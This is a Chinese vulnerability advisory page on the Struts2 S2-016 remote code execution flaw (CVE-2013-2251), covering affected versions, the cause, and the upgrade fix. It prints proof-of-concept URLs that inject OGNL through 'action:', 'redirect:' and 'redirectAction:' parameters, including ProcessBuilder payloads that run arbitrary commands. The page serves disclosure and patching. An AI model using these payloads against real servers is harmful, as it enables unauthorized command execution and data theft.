当前位置:首页 > 漏洞分享 > 正文
Struts2最新(S2-016)远程代码执行漏洞-CVE-2013-2251
880+

昨日,著名Java Web框架Struts官方再发高危安全漏洞补丁升级(最新版本为:2.3.15.1),升级修补了多个安全漏洞,其中包括一个远程任意代码的高危安全漏洞,这些漏洞可以影响到Struts 2.0.0 - Struts 2.3.15的所有版本。攻击者可以利用该漏洞,执行恶意Java代码,最终导致网站数据被窃取、网页被篡改等严重后果。Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。

漏洞信息

影响版本 Struts 2.0.0 - Struts 2.3.15

漏洞影响:远程执行命令
报告者 Takeshi Terada of Mitsui Bussan Secure Directions, Inc.
CVE编号      CVE-2013-2251

漏洞概述

The Struts 2 DefaultActionMapper supports a method for short-circuit navigation state changes by prefixing parameters with “action:” or “redirect:”, followed by a desired navigational target expression. This mechanism was intended to help with attaching navigational information to buttons within forms.

In Struts 2 before 2.3.15.1 the information following “action:”, “redirect:” or “redirectAction:” is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.

漏洞poc

在Struts的空白应用,打开下面的网址。

参数会以OGNL表达式执行

http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}

代码执行

http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}

解决方案

升级到到Struts 2.3.15.1,下地地址:http://struts.apache.org/download.cgi#struts23151

POC来自官方:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://struts.apache.org/release/2.3.x/docs/s2-017.html